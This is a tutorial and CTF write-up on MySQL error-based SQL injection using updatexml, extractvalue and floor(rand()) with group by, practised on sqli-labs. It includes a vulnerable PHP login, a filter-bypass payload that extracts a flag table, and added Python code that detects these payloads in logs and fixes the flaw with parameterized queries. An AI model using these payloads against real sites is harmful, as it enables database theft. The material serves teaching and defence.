0x00 Background
Notes on error-based SQL injection, compiled from several sources and organized in my own words.
The principle behind every injection is the same: user input is spliced into a statement that is then executed. When the database statement raises an error and the application echoes that error back to the page, error-based injection may be possible.
0x01 Concept
There are roughly three ways to perform error-based injection:
1: ?id=2' and (select 1 from (select count(*), concat(floor(rand(0)*2), (select (select (query statement)) from information_schema.tables limit 0,1)) x from information_schema.tables group by x) a)--+
2: ?id=2' and updatexml(1, concat(0x7e, (select query statement), 0x7e), 1)--+
3: ?id=1' and extractvalue(1, concat(0x7e, (select query statement), 0x7e))--+
Analysis of 1:
rand(0)*2 yields a pseudorandom number in the range [0, 2), so floor(rand(0)*2) is always either 0 or 1. When count(*) is combined with group by, MySQL groups the rows through a temporary (virtual) table keyed on the group-by expression: for each row it first evaluates the key and checks whether the virtual table already holds it; if the key is absent, the expression is evaluated a second time to insert the new entry. Because rand(0) is re-evaluated on that second call, the key that gets inserted can differ from the key that was checked, and once it collides with an entry inserted earlier MySQL raises a duplicate-key error. Once the table has a few rows this collision occurs.
For the details of why count(), rand() and group by together produce this error, see the Tsafe article on WooYun (乌云).
Analysis of 2:
The function has the form updatexml(xml_document, xpath_string, new_value). First argument: xml_document, a string, the name of the XML document object (doc). Second argument: xpath_string, a string in XPath format. Third argument: new_value, a string that replaces the matched data. Effect: it changes the value of the node in the document that matches the criteria, i.e. it replaces the value in xml_document that matches xpath_string.
Our injection statement is: updatexml(1, concat(0x7e, (select query statement), 0x7e), 1)
concat() joins its arguments into a single string. That string does not conform to the xpath_string format, so the XPath parser fails and the resulting error message, which includes the string, is returned.
Analysis of 3:
extractvalue(xml_document, xpath_string). First argument: xml_document, a string, the name of the XML document object. Second argument: xpath_string, a string in XPath format. Function: returns a string containing the value queried from the target XML.
Our injection statement is: extractvalue(1, concat(0x7e, (select query statement), 0x7e))
As in 2, because the concatenated string does not conform to the xpath_string format, it raises an error.
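All three techniques described above have a recognizable shape on the request side (the function names and the floor(rand())/group by construction) and, when the application echoes database errors, an equally recognizable shape on the response side. The following detector is an added example written for these notes, not code from the original post; the access-log and error-log lines it scans are constructed samples, and the error texts it matches (XPATH syntax error, Duplicate entry ... for key 'group_key', You have an error in your SQL syntax) are the messages MySQL emits in these situations.

```python
import re
from urllib.parse import unquote_plus

# Request-side signatures of the three error-based techniques covered above.
REQUEST_SIGNATURES = {
    "updatexml": re.compile(r"updatexml\s*\(", re.I),
    "extractvalue": re.compile(r"extractvalue\s*\(", re.I),
    # floor(rand(...)*2) followed (anywhere later) by a group by clause
    "floor_rand_groupby": re.compile(
        r"floor\s*\(\s*rand\s*\([^)]*\)\s*\*\s*2\s*\)[\s\S]*?group\s+by", re.I),
}

# Response-side signatures: the MySQL error texts these techniques provoke,
# plus the generic syntax error that a bare quote probe (?id=1') produces.
RESPONSE_SIGNATURES = {
    "xpath_error": re.compile(r"XPATH syntax error", re.I),
    "duplicate_group_key": re.compile(r"Duplicate entry .* for key 'group_key'", re.I),
    "mysql_syntax_error": re.compile(r"You have an error in your SQL syntax", re.I),
}

# Combined-log request line: "GET /path?query HTTP/1.1"
REQUEST_LINE = re.compile(r'"(?:GET|POST|HEAD) ([^ ]+) HTTP/')


def classify_request(query_string):
    """Return the names of request-side signatures found in a query string.
    Decoding twice catches double-encoded parameters and is harmless otherwise."""
    decoded = unquote_plus(unquote_plus(query_string))
    return [name for name, rx in REQUEST_SIGNATURES.items() if rx.search(decoded)]


def classify_response(text):
    """Return the names of response-side signatures found in a page body or app log line."""
    return [name for name, rx in RESPONSE_SIGNATURES.items() if rx.search(text)]


def scan_access_log(lines):
    """Scan access-log lines; report each line whose query string carries a signature."""
    findings = []
    for line_no, line in enumerate(lines, 1):
        m = REQUEST_LINE.search(line)
        if not m:
            continue
        path = m.group(1)
        query = path.split("?", 1)[1] if "?" in path else ""
        hits = classify_request(query)
        if hits:
            findings.append({"line_no": line_no, "query": query, "hits": hits})
    return findings


# Constructed sample access-log lines (sqli-labs style paths, made up for this example).
# Line 2 is a bare quote probe: it carries no request-side signature and is only
# visible through the echoed database error on the response side.
SAMPLE_ACCESS_LOG = [
    '10.0.0.5 - - [01/Oct/2017:10:00:00 +0000] "GET /Less-5/?id=1 HTTP/1.1" 200 612',
    '10.0.0.5 - - [01/Oct/2017:10:00:02 +0000] "GET /Less-5/?id=1%27 HTTP/1.1" 200 734',
    '10.0.0.5 - - [01/Oct/2017:10:00:05 +0000] "GET /Less-5/?id=2%27%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),1)--+ HTTP/1.1" 200 801',
    '10.0.0.5 - - [01/Oct/2017:10:00:07 +0000] "GET /Less-5/?id=1%27%20and%20extractvalue(1,concat(0x7e,(select%20database()),0x7e))--+ HTTP/1.1" 200 798',
    '10.0.0.5 - - [01/Oct/2017:10:00:09 +0000] "GET /Less-5/?id=2%27%20and%20(select%201%20from(select%20count(*),concat(floor(rand(0)*2),(select%20database()))x%20from%20information_schema.tables%20group%20by%20x)a)--+ HTTP/1.1" 200 812',
]

# Constructed sample application-log lines holding echoed database errors.
SAMPLE_ERROR_LOG = [
    "XPATH syntax error: '~ctf_db~'",
    "Duplicate entry '1ctf_db' for key 'group_key'",
    "You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version",
]

if __name__ == "__main__":
    for finding in scan_access_log(SAMPLE_ACCESS_LOG):
        print(finding["line_no"], finding["hits"], finding["query"])
    for line in SAMPLE_ERROR_LOG:
        print(classify_response(line), line)
```

The response-side matches are the more important signal for a defender: they only fire when the application hands database error text to the client, which is the precondition for error-based injection in the first place. The fix on that side is to stop echoing the error (the exit(mysql_error()) pattern shown later in these notes) and return a generic message while logging the detail server-side.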
0x03 Practice
Using sqli-labs as the test target.
With ?id=1':
With ?id=1'%23:
Substituting the payload above:
The error message produced by updatexml displays the database name; the table names and then the column names are obtained by the same steps.
0x04 CTF Example
ichunqiu Baidu Cup, October, vid
Information gathering is omitted here; straight to the SQL injection part.
There is only one login box. The source code:
<?php

require_once 'Dbmysql.class.php';
require_once 'Config.inc.php';

if (isset($_POST['username']) && isset($_POST['password']) && isset($_POST['number'])) {
    $db = new mysql_db();
    $username = $db->safe_data($_POST['username']);
    $password = $db->my_md5($_POST['password']);
    $number = is_numeric($_POST['number']) ? $_POST['number'] : 1;

    // the number is removed from the already-escaped username
    $username = trim(str_replace($number, '', $username));

    // input is spliced straight into the statement
    $sql = "SELECT * from " . "`" . table_name . "`" . " where username=" . "'" . $username . "'";
    $row = $db->query($sql);
    $result = $db->fetch_array($row);
    if ($row) {
        if ($result["number"] === $number && $result["password"] === $password) {
            echo "<script>alert('Nothing here!')</script>";
        } else {
            echo "<script>
                alert('Wrong password, old driver overturned!');
                function jumpUrl() {
                    location = 'login.html';
                }
                setTimeout('jumpUrl()', DELAY_MS); /* DELAY_MS: the numeric delay was lost in extraction */
            </script>";
        }
    } else {
        // the database error text is sent straight to the client
        exit(mysql_error());
    }
} else {
    echo "<script>
        alert('User name password cannot be empty!');
        function jumpUrl() {
            location = 'login.html';
        }
        setTimeout('jumpUrl()', DELAY_MS); /* DELAY_MS: the numeric delay was lost in extraction */
    </script>";
}
?>
Definition of safe_data():
public function safe_data($value) {
    if (MAGIC_QUOTES_GPC) {
        stripcslashes($value);   // return value is discarded; $value is unchanged
    }
    return addslashes($value);
}
The username is first escaped by safe_data() when it comes in, then processed by str_replace() and trim() to remove the number and surrounding whitespace, and finally used in the SQL query. The query splices the input directly, but the single quote has to be closed, and a single quote in the username gets a backslash added to it as soon as it arrives.
I only understood how to construct the payload after reading the writeup on the ichunqiu forum:
number=0&username=test%00'%23. The username is escaped to test\0\'%23; the replace operation then removes the 0 and leaves test\\'%23, where the two backslashes escape each other and the single quote is free. Because trim() is used, spaces cannot be used to separate fields, but + can be used to connect them instead.
The final username is:
username=admin%00'+and+updatexml(1,concat(1,(select+*+from+flag+limit+1),1),1)%23
Only 32 characters can be read out this way, so the substr function is needed to get the full flag.
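The root cause in this challenge is the order of operations: the input is escaped first and then modified, so the modification can undo the escaping. The script below is an added example written for these notes, not the CTF's code; it re-implements PHP's addslashes() in Python, shows the original order beside the corrected order (transform first, escape last) with a small checker for unescaped quotes under MySQL's backslash semantics, and then shows the actual fix, a parameterized query plus a generic client-side message, using an in-memory sqlite3 database with a constructed users table as a stand-in for the MySQL class.

```python
import sqlite3


def addslashes(value):
    """Python equivalent of PHP addslashes(): backslash-escape ' " \\ and NUL."""
    out = []
    for ch in value:
        if ch in ("'", '"', "\\"):
            out.append("\\" + ch)
        elif ch == "\x00":
            out.append("\\0")
        else:
            out.append(ch)
    return "".join(out)


def has_unescaped_quote(fragment):
    """True if a single quote in the fragment is not protected by a backslash
    (MySQL backslash-escape semantics: a backslash escapes the next character)."""
    i = 0
    while i < len(fragment):
        if fragment[i] == "\\":
            i += 2            # skip the escaped character
            continue
        if fragment[i] == "'":
            return True
        i += 1
    return False


def sanitize_original_order(username, number):
    """The challenge's order: escape first, then strip the number and trim."""
    escaped = addslashes(username)
    return escaped.replace(number, "").strip()


def sanitize_fixed_order(username, number):
    """Corrected order: transform the raw input first, escape as the last step."""
    stripped = username.replace(number, "").strip()
    return addslashes(stripped)


def make_db():
    """Constructed users table standing in for the MySQL table in the challenge."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, number TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('admin', '1', 'constructed-hash')")
    return conn


def spliced_lookup(conn, username):
    """String splicing, like the challenge's \"where username='\" . $username . \"'\"."""
    return conn.execute("SELECT * FROM users WHERE username='" + username + "'").fetchone()


def parameterized_lookup(conn, username):
    """The fix: the driver binds the value, so quotes and NULs are plain data."""
    return conn.execute("SELECT * FROM users WHERE username=?", (username,)).fetchone()


def login(conn, username, lookup, audit_log):
    """Generic client message; database error text stays in the server-side log
    instead of being echoed like exit(mysql_error())."""
    try:
        row = lookup(conn, username)
    except sqlite3.Error as exc:
        audit_log.append(f"db error for username={username!r}: {exc}")
        return "Login failed"
    return "Nothing here!" if row else "Wrong password"


if __name__ == "__main__":
    probe = "test\x00'#"     # the writeup's username, URL-decoded
    print(repr(sanitize_original_order(probe, "0")), has_unescaped_quote(sanitize_original_order(probe, "0")))
    print(repr(sanitize_fixed_order(probe, "0")), has_unescaped_quote(sanitize_fixed_order(probe, "0")))
    db, log = make_db(), []
    print(login(db, "admin'", spliced_lookup, log), log)
    print(login(db, "admin'", parameterized_lookup, log))
```

Reordering the sanitization only patches this one bypass; the parameterized lookup removes the whole class of problem because no string the user controls is ever parsed as SQL, and the generic message removes the echoed error that error-based injection depends on.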
0x05 Summary
Only updatexml is used as the example here; the other two techniques work on the same principle.
Also, carrying out this kind of injection by hand on sqli-labs is very slow, so consider writing an automated script.
SQL error-based injection, with sqli-labs and the Baidu Cup CTF (vid)